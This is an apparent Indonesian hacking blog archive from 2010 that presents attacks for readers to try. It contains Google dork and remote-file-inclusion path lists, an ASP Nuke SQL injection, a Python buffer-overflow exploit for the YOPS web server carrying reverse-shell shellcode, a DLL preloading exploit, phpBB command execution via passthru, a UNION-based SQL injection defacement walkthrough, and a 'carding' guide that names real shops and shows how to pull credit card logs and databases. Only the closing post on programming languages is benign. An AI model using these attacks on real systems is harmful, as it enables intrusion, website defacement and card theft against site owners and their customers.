dork: "powered by EQdkp"
rfi of this dork: /includes/dbal.php?eqdkp_root_path=

inurl:"template.php?goto="
inurl:"video.php?content="
inurl:"pages.php?page="
inurl:"index1.php?choix="
inurl:"index1.php?menu="
inurl:"index2.php?ascii_seite="

dork: inurl:surveys
rfi to this dork: /surveys/survey.inc.php?path=

inurl:"index.php?body="

dork: allinurl:adobt sitel
rfi to this dork: /classes/adodbt/sql.php?classes_dir=

dork: "Powered By ScozNews"
rfi to this dork: /sources/functions.php?CONFIG[main_path]=
rfi to this dork: /sources/template.php?CONFIG[main_path]=

inurl:"kb_constants.php?module_root_path="

dork: allinurl:"mcf.php"
rfi to this dork: /mcf.php?content=

dork: inurl:"main.php?sayfa="
rfi to this dork: /main.php?sayfa=

dork: "MobilePublisherPHP"
rfi to this dork: /header.php?abspath=

dork: "powered by phpCOIN 1.2.3"
rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
allinurl:login.php?dir=
inurl:"index.php?go="
inurl:"index1.php?="
inurl:"lib/gore.php?libpath="
inurl:"index2.php?p="

PHPBB
/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=
/language/lang_german/lang_main_album.php?phpbb_root_path=
link_main.php?phpbb_root_path=
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=
MOD_forum_fields_parse.php?phpbb_root_path=
/codebb/pass_code.php?phpbb_root_path=
/codebb/lang_select?phpbb_root_path=
includes/functions_nomoketos_rules.php?phpbb_root_path=
includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/ezconvert/config.php?ezconvert_dir=
/includes/class_template.php?phpbb_root_path=
/includes/usercp_viewprofile.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
menu.php?sesion_idioma=
/includes/functions.php?phpbb_root_path=
/admin/admin_linkdb.php?phpbb_root_path=
/admin/admin_forum_prune.php?phpbb_root_path=
/admin/admin_extensions.php?phpbb_root_path=
/admin/admin_board.php?phpbb_root_path=
/admin/admin_attachments.php?phpbb_root_path=
/admin/admin_users.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/admin/modules_data.php?phpbb_root_path=
/faq.php?foing_root_path=
/index.php?foing_root_path=
/list.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/gen_m3u.php?foing_root_path=
/view_artist.php?foing_root_path=
/view_song.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/flash/set_na.php?foing_root_path=
/flash/initialise.php?foing_root_path=
/flash/get_song.php?foing_root_path=
/includes/common.php?foing_root_path=
/admin/nav.php?foing_root_path=
/admin/main.php?foing_root_path=
/admin/list_artists.php?foing_root_path=
/admin/index.php?foing_root_path=
/admin/genres.php?foing_root_path=
/admin/edit_artist.php?foing_root_path=
/admin/edit_album.php?foing_root_path=
/admin/config.php?foing_root_path=
/admin/admin_status.php?foing_root_path=
language/lang_english/lang_prillian_faq.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/language/lang_french/lang_prillian_faq.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/functions_rpg_events.php?phpbb_root_path=
/admin/admin_spam.php?phpbb_root_path=
/includes/functions_newshr.php?phpbb_root_path=
/zufallscodepart.php?phpbb_root_path=
/mods/iai/includes/constants.php?phpbb_root_path=
/root/includes/antispam.php?phpbb_root_path=
/phpBB2/shoutbox.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/journals_delete.php?phpbb_root_path=
/includes/journals_post.php?phpbb_root_path=
/includes/journals_edit.php?phpbb_root_path=
/includes/functions_num_image.php?phpbb_root_path=
/includes/functions_user_viewed_posts.php?phpbb_root_path=
/includes/themen_portal_mitte.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/functions_static_topics.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=
/includes/functions_kb.php?phpbb_root_path=
/includes/bbcb_mg.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=
/includes/pafiledb_constants.php?module_root_path=
/index.php?phpbb_root_path=
/song.php?phpbb_root_path=
/faq.php?phpbb_root_path=
/list.php?phpbb_root_path=
/gen_m3u.php?phpbb_root_path=
/playlist.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/modules/Forums/admin/index.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_board.php?phpbb_root_path=
/modules/Forums/admin/admin_disallow.php?phpbb_root_path=
/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=
/modules/Forums/admin/admin_groups.php?phpbb_root_path=
/modules/Forums/admin/admin_ranks.php?phpbb_root_path=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=
/modules/Forums/admin/admin_words.php?phpbb_root_path=
/modules/Forums/admin/admin_avatar.php?phpbb_root_path=
/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=
/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=
/modules/Forums/admin/admin_forums.php?phpbb_root_path=
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=
/modules/Forums/admin/admin_smilies.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_users.php?phpbb_root_path=
/stat_modules/users_age/module.php?phpbb_root_path=
/includes/functions_cms.php?phpbb_root_path=
/m2f/m2f_phpbb204.php?m2f_root_path=
/m2f/m2f_forum.php?m2f_root_path=
/m2f/m2f_mailinglist.php?m2f_root_path=
/m2f/m2f_cron.php?m2f_root_path=
/lib/phpbb.php?subdir=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_admin.php?phpbb_root_path=
/toplist.php?f=toplist_top10&phpbb_root_path=
/admin/addentry.php?phpbb_root_path=
/includes/kb_constants.php?module_root_path=
/auth/auth.php?phpbb_root_path=
/auth/auth_phpbb/phpbb_root_path=
/auction/auction_common.php?phpbb_root_path=
/auth/auth_SMF/smf_root_path=
/auth/auth.php?smf_root_path=

Selamat Mencoba.... Silahkan Berikan Masukan / Tambahan Yang Lain Jika Masih Ada Terdapat Kekurangan.... Terima Kasih

ASP Nuke SQL Injection Vulnerability

2010-09-12T05:19:00.000-07:00

Hmm.. Ini Vuln ASP Nuke Yang Kemungkinan Bisa Kita Pelajari...
Cekidot aja deh :

Description :
===========================================================================================

1)- SQl Injection
This version of ASP Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Valnerable Code in .../module/article/article/article.asp:

Ln 37:
sStat = "SELECT art.ArticleID, art.Title, art.ArticleBody, " &_
" auth.FirstName, auth.LastName, " &_
" cat.CategoryName, art.CommentCount, " &_
" art.Created " &_
"FROM tblArticle art " &_
"INNER JOIN tblArticleAuthor auth ON art.AuthorID = auth.AuthorID " &_
"INNER JOIN tblArticleToCategory atc ON atc.ArticleID = art.ArticleID " &_
"INNER JOIN tblArticleCategory cat ON atc.CategoryID = cat.CategoryID " &_
"WHERE art.ArticleID = " & steForm("articleid") & " " &_
"AND art.Active <> 0 " &_
"AND art.Archive = 0"

Considering to the code, you can browse these URLs:

http://www.site.com/module/article/article/article.asp?articleid=7' (the false Query will be shown)
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'='a'-- (this Query is always true)

with the following URL you can find the first character of Username:
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)--

and second character:
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)--

and so on.

So you gain Admin's information like this:
Username : admin
Password : (sha256 hash)

Discovery : www.abysssec.com
Vendor : http://www.aspnuke.com

Sumber:
http://www.exploit-db.com/exploits/14969/

Selamat Mencoba Buat Ngembangin Ilmu kita...hehe

YOPS Web Server Remote Command Execution

2010-09-12T05:15:00.000-07:00

Cuma Sekedar Share .....
Silahkan Di pelajari ^_^

- YOPS (Your Open Personal [WEB] Server)

[Vendor Product Description]

- YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
server for Linux OS written in C. There are 7 stages (accept, parse,
launch, fetch, error, send and log), and pipes are used as interstage
channels.

[Bug Description]

- In function http_parse_request_header the application fails to do a
boundary check for a malformed buffer received as a HTTP command
(HEAD/GET/POST), prior to use it as input for logger variable at
swebs_record_log function.

--- http.c snippet ---
int http_parse_request_header(char *data, struct http_request_header *h)
{
int r;
int ver, rev;
char *s, *tok, *l, *prm;
[...]
r = sscanf(h->http, " HTTP/%d.%d ", &ver, &rev);
if (r != 2)
return -400;
[...]
}
--- END snippet ---

--- swebs.c snippet ---
int swebs_record_log(int log, JOB *job)
{
int err;
time_t now;
char timestr[32];
char logrec[MAX_REQUEST_LINE_LEN + 1];
[...]
sprintf (
logrec,
"%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d",
job->client,
timestr,
job->hdr.request_line,
job->response_hlen,
job->response_blen_sent,
job->response_blen,
job->status
);
[...]
}
--- END snippet ---

[History]

- Advisory sent to vendor on 08/26/2010

[Impact]

- High (Remote Command Execution)

[Affected Version]

- YOPS 2009-11-30

- Prior versions may also be vulnerable

[Code]

#!/usr/bin/python
# Software:
# YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
server for Linux OS written in C.
# URL: http://sourceforge.net/projects/yops2009/
#
# Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
# Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
# Contact: waKKu dclabs com br

HOST = "localhost"
PORT = 8888

import socket
import sys
import time

try:
BUFF_LEN = int(sys.argv[1])
except:
BUFF_LEN = 802
FIXUP_ADDR = "\x47\xce\x04\x08"

shellcode = (
# MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444
"\x33\xc9\xb1\x13\xbe\xae\x88\x55\xcb\xda\xcd\xd9\x74\x24\xf4"
"\x5f\x31\x77\x0e\x03\x77\x0e\x83\x69\x8c\xb7\x3e\x44\x56\xc0"
"\x22\xf5\x2b\x7c\xcf\xfb\x22\x63\xbf\x9d\xf9\xe4\x9b\x3f\x6a"
"\x9a\x1b\xbf\x6b\x02\x74\xae\x37\xac\xd7\xba\xd7\x61\x88\xb3"
"\x39\xc2\x42\xa5\xe1\x08\x12\x70\x95\x4a\xa3\xbd\x54\xec\x8d"
"\xb8\x9f\xbd\x65\x15\x4f\x4d\x1e\x01\xa0\xd3\xb7\xbf\x37\xf0"
"\x18\x6c\xc1\x16\x28\x99\x1c\x58\x43"
)

buffer = "HEAD "
buffer += "A"*BUFF_LEN
buffer += FIXUP_ADDR*4
buffer += " HTTP/1.1"

stackadjust = (
"\xcb" # instruction alignment
"\xbc\x69\x69\x96\xb0" # Stack Adjustment
)

payload = buffer + stackadjust + shellcode + "\r\n\r\n"

print """
######################################
### DcLabs Security Research Group ###
### +Exploit+ ###
######################################
Software: YOPS 2009 - Web Server
---
Vulnerability by: ipax
Exploit by: waKKu
Greetings to: All DcLabs members
"""

print " [+] Using BUFF_LEN -> ", str(BUFF_LEN)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print " [+] Trying to establish connection..."
s.connect((HOST, PORT))
print " [+] Sending a dummy request to initialize data..."
s.send("HEAD DcLabs HTTP/1.1\r\n\r\n")
try:
s.recv(1024)
except:
pass
s.close()

time.sleep(3)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print " [+] Sending our malicious payload..."
s.send(payload)
print " [+] Payload sent, good luck!"
s.close()

Sumber : http://inj3ct0r.com/exploits/14065

Nah, Selamat Mencoba...

Prevx DLL Preloading Exploit

2010-09-12T05:06:00.000-07:00

====================================================
= PREVX DLL PRELOADING EXPLOIT =
====================================================

Exploit Title : [Prevx DLL preloading exploit]
Date : [11 Sept 2010]
Author : [STRELiTZIA]
Software : [Prevx 3.0.5.189]
Tested on : [Windows Xp SP3]

============================
= Description =
============================
Prevx search and laod "pxi1.dll" library without checks, or any visual warning messages related to
library modifications.
Vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege
context of the targeted application.

============================
= Instructions =
============================
Default searching folders:
C:\WINDOWS\pxi1.dll
C:\WINDOWS\system\pxi1.dll
C:\WINDOWS\system32\pxi1.dll
C:\WINDOWS\system32\wbem\pxi1.dll

Additional folders if exists:
C:\Program Files\Borland\Delphi7\Bin\pxi1.dll
C:\Program Files\Borland\Delphi7\Projects\Bpl\pxi1.dll
C:\Documents and Settings\All Users\Documents\RAD Studio\7.0\Bpl\pxi1.dll

1- Copy "Test.dll" into "%One of listed folders% folder"
2- Rename "Test.dll" to "pxi1.dll"

============================
= Tests =
============================
- Launch Prevx.
- Restart your PC.

============================
= Test Dll Source "Delphi" =
============================
Library Test;
uses
Windows;

begin
MessageBoxA
(
0,
PChar('Yep, I''m running in your system without your permission.'),
PChar('Sample'),
MB_ICONSTOP
);
end.

Sumber : http://inj3ct0r.com/exploits/13987

Selamat Mencoba ...

Dork List Yang Masih Ampuh

2010-09-12T04:32:00.000-07:00

Daftar Dork Yang Masih Ampun Dan Masih Digunakan Banyak Web, Sbb :

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=

inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

Dan Tutorial yang bisa di gunakan : http://prorebell.blogspot.com/2010/09/tutorial-deface-untuk-pemula.html

Serta Tools SQLi yang juga Bisa Di gunakan : http://prorebell.blogspot.com/2010/09/havij-injection-tool-v110-sql-injector.html

Selamat Mencoba :)

Tutorial Deface Aspx Untuk Pemula

2010-09-12T03:59:00.000-07:00

Hmm..Untuk Aspx, Mungkin Tutorial Ini masih cukup berguna....
Langsung Coba aja deh ...hihihiih

Langkah-langkah : Dork ->>> inurl:Fck/fcklinkgallery.aspx Atau
inurl:tabid "aspx" site:il Dan Masih Bannyak Lagi ^^

Pilih >> File ( A File On Your Site )

masukin kode ini di URL,trus jalanin

--------------------------- cut here -----------------------------------------

javascript:__doPostBack('ctlURL$cmdUpload','')

-------------------------- end here -----------------------------------------

Ntar muncul browse utk upload file,tgl di upload aja Wink

Oia,file yg bisa di upload antara lain :

*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob

masang shell ? coba aja ^_^

Selamat Mencoba dan Ayoo Saling share... Silahkan Di Komentari Jika masih ada yang kurang di posting ini .... Terima kasih

Tutorial Hacking PHPBB 2.0.10

2010-09-12T03:43:00.000-07:00

Tutorial ini mungkin sudah lama banget, bahkan mungkin sudah hampir punah... Tapi akan tetap saya share sebagai bahan pembelajaran dan pengetahuan...

langsung saja ini langkah-langkah nya :

Hacking PHPBB 2.0.10
hacking phpbb 2.0.10

1. Cari sasaran menggunakan paman google. keywordnya = phpbb 2.0
Jangan menggunakan keyword viewtopic karena gak akan diijinkan.

2. Kunjungi alamat forum yang didapat. Lihat dan kunjungi hingga pada bagian address tertulis
http://sasaran.com/viewtopic.php?t=4(angka 4 bisa saja lain)

3. Kemudian pada bagian address coba tambahkan &highlight=%2527
http://sasaran.com/viewtopic.php?t=4&highlight=%2527

4. Jika yang muncul adalah error, maka bererti forumnya vuln (bolong). Jika tidak, cari sasaran lain. :-)

5. Setelah Muncul error coba tambahkan lagi menjadi

http://sasaran.com/viewtopic.php?t=t=4&highlight=%2527.passthru($HTTP_GET_VARS[cmd]).%2527&cmd=ls -al

6. Jika yang muncul adalah daftar nama file dan direktori, selamat anda telah berhasil masuk ke dalam sysytem sasaran

7. Jika ada error tetapi eksekusi perintah cmd= tidak berjalan kemungkinan fungsi passthru sudah dimatikan oleh admin. Cari sasaran lain.

Nah silahkan di pelajari lebih dalam dan semoga tutorial ini bsa bermantaaf dan berguna ... amin.

Carding Tutorial Achive

2010-09-12T03:35:00.000-07:00

Langsung aja deh, tanpa komat-kamit...huehehehe

Lets Begin – Just For Share!

CGI Store Log

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm

2. Kemudian hapus/delete Repair_Manuals.htm di url/browsing sehingga menjadi http://www.cashwells.com/cgi-bin/store/index.cgi?page=

3. Masukkan file ini di belakang situs tadi :

../admin/files/order.log

Misal nya http://www.cashwells.com/cgi-bin/store/index.cgi?page=../admin/files/order.log

4. Maka yang keluar di situs itu adalah nomor CC (credit card).

Admin Take Over

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.partsupply.in.th/shopadmin.asp

2. Langkah selanjutnya gunakan teknik SQL Injection

user : ‘or”=’
pass : ‘or”=’

3. Trus kamu buka file2 yang ada disana satu persatu. Dapat deh……. CC yg kita inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu bernasib baik. Tapi kalo belum ada nomor CC (credit card) disana, artinya kamu belum beruntung. Coba cari lagi target lain.

Database Downloadable

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.youngsliquors.com/winestore/shopadmin.asp

2. Kemudian hapus/delete shopadmin.asp di url/browsing sehingga menjadi http://www.youngsliquors.com/winestore/

3. Masukkan file ini di belakang situs tadi :

shopdbtest.asp

Misal nya http://www.youngsliquors.com/winestore/shopdbtest.asp

4. Trus lihat apa nama databasenya dan letaknya pada : xDatabase dan xDblocation
contoh :

xDatabase : shopping300
xDatabase :../../../../www/youngsliquors/5498761211

5. Skrg utk mendownload file shopping300 dapat dilakukan dgn merubah url/browsing nya menjadi :

http://www.youngsliquors.com/winestore/shopping300.mdb

6. Kalo sudah di download, buka file shopping300.mdb dgn Microsoft Access.

Metacart

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.imagexpres.com/metacart/moreinfo.asp

2. Kemudian hapus/delete moreinfo.asp di url/browsing sehingga menjadi http://www.imagexpres.com/metacart/

3. Masukkan file ini di belakang situs tadi :

database/metacart.mdb

Misal nya http://www.imagexpres.com/metacart/database/metacart.mdb

6. Kalo sudah di download, buka file metacart.mdb dgn Microsoft Access.

PDshopPro Shopping Cart

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.marktwainbooks.com/shop/category.asp?catid=4

2. Kemudian hapus/delete shop/category.asp?catid=4 di url/browsing sehingga menjadi http://www.marktwainbooks.com

3. Masukkan file ini di belakang situs tadi :

admin/dbsetup.asp

Misal nya http://www.marktwainbooks.com/admin/dbsetup.asp

4. Maka yang keluar di situs target adalah :

Your Database Type :
Microsoft Access
Your Connection String :
Driver={Microsoft Access Driver (*.mdb)}; DBQ=d:\inetpub\marktwainbooks\data\pdshoppro.mdb;
Current Status :
Connection to Database OK.
Database Primary ’setup’ Table Found!
Database permissions OK!

5. Skrg utk mendownload file pdshoppro.mdb dapat dilakukan dgn merubah url/browsing nya menjadi :

http://www.marktwainbooks.com/data/pdshoppro.mdb

6. Kalo sudah di download, buka file pdshoppro.mdb dgn Microsoft Access.

Nah silahkan Di coba dan Di perdalami bagi para carder. Just Share :)

Tutorial Deface Untuk Pemula

2010-09-12T03:19:00.000-07:00

Sharing Lagi Nih... Tutorial Deface Suatu Web Dengan Munggunakan Sebaik Mungkin Suatu Vuln / Eror Di Suatu Web Site.

Langsung Aja ...

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --

information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
[+]step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut ( Masih Banyak Lagi ) :

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"

==========
[+]step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh: [site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--

===========
[+]step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek
versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..

============
[+]step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"

===========
[+]step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
[+] step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

www.ascii-convert.co.cc

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

Nah, nanti akan ada beberapa password yang sudah di encrypt. jadi butuh decrtypt dulu ini membuka encrypt password nya

Decrypt password Disini : http://www.hashchecker.de/

==============
[+] step Delapan:=
==============

tahap terakhir mencari halam admin atau login

Link : http://th3-0utl4ws.com/tools/admin-finder/index.php

Nah Demikian Tutorial Yang Bisa Saya Share, Semoga Bisa Bermanfaat dan Bisa Menjadi Dasar Dari Seorang Defacer :)

Macam-macam bahasa pemprograman

2010-09-12T02:41:00.000-07:00

Hmm.. lagi coba googling... ehh ternyata ada pembahasan tentang bahasa pemprograman...
ya kita langsung share aja deh... moga2 bisa di manfaatkan :).

Macam-macam bahasa pemrograman
Bagi anda yang bekerja dalam bidang web design pasti sudah tidak asing lagi dengan apa yang nama bahasa pemrograman.Bahasa pemrograman yang umum dikenal adalah php dan html.Tapi sebenarnya masih banyak bahasa pemrograman yang lain.

Berikut ini ada beberapa macam bahasa pemrograman yang perlu anda ketahui

1. Bahasa Pemrograman HTML
HyperText Markup Language (HTML) adalah sebuah bahasa markup yang digunakan untuk membuat sebuah halaman web dan menampilkan berbagai informasi di dalam sebuah browser Internet.
HTML saat ini merupakan standar Internet yang didefinisikan dan dikendalikan penggunaannya oleh World Wide Web Consortium (W3C).
HTML berupa kode-kode tag yang menginstruksikan browser untuk menghasilkan tampilan sesuai dengan yang diinginkan.
Sebuah file yang merupakan file HTML dapat dibuka dengan menggunakan browser web seperti Mozilla Firefox atau Microsoft Internet Explorer.

2. Bahasa Pemrograman PHP
PHP adalah bahasa pemrograman script yang paling banyak dipakai saat ini.
PHP pertama kali dibuat oleh Rasmus Lerdorf pada tahun 1995. Pada waktu itu PHP masih bernama FI (Form Interpreted), yang wujudnya berupa sekumpulan script yang digunakan untuk mengolah data form dari web.
PHP banyak dipakai untuk membuat situs web yang dinamis, walaupun tidak tertutup kemungkinan digunakan untuk pemakaian lain.
PHP biasanya berjalan pada sistem operasi linux (PHP juga bisa dijalankan dengan hosting windows).

